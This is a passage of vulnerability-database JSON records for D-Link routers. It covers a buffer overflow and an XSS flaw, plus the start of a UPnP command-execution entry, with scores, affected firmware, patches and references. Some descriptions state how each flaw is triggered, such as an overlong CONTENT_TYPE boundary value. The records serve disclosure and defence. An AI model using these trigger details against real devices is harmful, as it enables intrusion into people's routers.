"cve": "CVE-2017-14948",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-14948",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-39553",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-14948",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14948",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-14948",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-14948",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2019-39553",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-1326",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39553"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1326"
},
{
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with \u0027\u0027boundary=\u0027 followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution. plural D-Link The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-880L is a wireless AC1900 dual-band Gigabit cloud router. D-Link DIR-895 L / R is an AC5300 Wi-Fi tri-band router. \n\nA buffer overflow vulnerability exists in the htdocs / fileaccess.cgi component in D-Link DIR-880L 1.08B04 and DIR-895 L / R 1.13b03. An attacker could use this vulnerability to execute arbitrary code through a specially crafted HTTP request",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14948"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"db": "CNVD",
"id": "CNVD-2019-39553"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14948",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014768",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-39553",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1326",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39553"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1326"
},
{
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"id": "VAR-201910-1472",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39553"
}
],
"trust": 1.3633928649999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39553"
}
]
},
"last_update_date": "2024-11-23T21:59:39.470000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dlink.com/en/consumer"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://github.com/badnack/d_link_880_bug/blob/master/readme.md"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14948"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14948"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39553"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1326"
},
{
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-39553"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1326"
},
{
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39553"
},
{
"date": "2019-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"date": "2017-09-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1326"
},
{
"date": "2019-10-14T18:15:10.263000",
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39553"
},
{
"date": "2019-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"date": "2019-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1326"
},
{
"date": "2024-11-21T03:13:49.407000",
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-1326"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Classic buffer overflow vulnerability in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-1326"
}
],
"trust": 0.6
}
}
var-201803-1766
Vulnerability from variot
XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi. D-Link DIR-868L , DIR-865L ,and DIR-860L Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-868L, DIR-865L and DIR-860L are all D-Link wireless router products. A cross-site scripting vulnerability exists in the htdocs/webinc/js/adv_parent_ctrl_map.php file in D-LinkDIR-868L, DIR-865L, and DIR-860L. The following products and versions are affected: D-Link DIR-868L DIR868LA1_FW112b04 and earlier; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L DIR860LA1_FW110b04 and earlier
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1766",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-865l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw112b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw110b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir860la1_fw110b04"
},
{
"model": "dir-865l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir-865l_reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir868la1_fw112b04"
},
{
"model": "dir-868l \u003c=dir868la1 fw112b04",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-865l \u003c=dir-865l reva patch 1.08.b01",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-860l \u003c=dir860la1 fw110b04",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-860l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw110b04"
},
{
"model": "dir-865l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw112b04"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-152"
},
{
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-860l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-865l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
}
]
},
"cve": "CVE-2018-6527",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-6527",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-06630",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-136559",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-6527",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-6527",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-6527",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-6527",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2018-06630",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-152",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-136559",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "VULHUB",
"id": "VHN-136559"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-152"
},
{
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi. D-Link DIR-868L , DIR-865L ,and DIR-860L Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-868L, DIR-865L and DIR-860L are all D-Link wireless router products. A cross-site scripting vulnerability exists in the htdocs/webinc/js/adv_parent_ctrl_map.php file in D-LinkDIR-868L, DIR-865L, and DIR-860L. The following products and versions are affected: D-Link DIR-868L DIR868LA1_FW112b04 and earlier; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L DIR860LA1_FW110b04 and earlier",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-6527"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "VULHUB",
"id": "VHN-136559"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-6527",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-152",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-06630",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-136559",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "VULHUB",
"id": "VHN-136559"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-152"
},
{
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"id": "VAR-201803-1766",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "VULHUB",
"id": "VHN-136559"
}
],
"trust": 1.5752999514285713
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
}
]
},
"last_update_date": "2024-11-23T23:08:45.921000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-860L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"title": "DIR-865L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"title": "DIR-868L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"title": "Patch for D-LinkDIR Series Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/124005"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-136559"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://github.com/thebeeman/pwning-multiple-dlink-router-via-soap-proto"
},
{
"trust": 1.1,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-860l/reva/dir-860l_reva_firmware_patch_notes_1.11b01_en_ww.pdf"
},
{
"trust": 1.1,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-868l/reva/dir-868l_reva_firmware_patch_notes_1.20b01_en_ww.pdf"
},
{
"trust": 1.1,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-865l/reva/dir-865l_reva_firmware_patch_notes_1.10b01_en_ww.pdf"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-6527"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-6527"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "VULHUB",
"id": "VHN-136559"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-152"
},
{
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"db": "VULHUB",
"id": "VHN-136559"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-152"
},
{
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"date": "2018-03-06T00:00:00",
"db": "VULHUB",
"id": "VHN-136559"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"date": "2018-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-152"
},
{
"date": "2018-03-06T20:29:00.780000",
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06630"
},
{
"date": "2018-03-27T00:00:00",
"db": "VULHUB",
"id": "VHN-136559"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002678"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-152"
},
{
"date": "2024-11-21T04:10:50.220000",
"db": "NVD",
"id": "CVE-2018-6527"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-152"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Product cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002678"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-152"
}
],
"trust": 0.6
}
}
cve-2019-17621
Vulnerability from cvelistv5
Published
2019-12-30 16:09
Modified
2025-02-04 20:34
Severity ?
EPSS score ?
Summary
The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T01:47:13.504Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
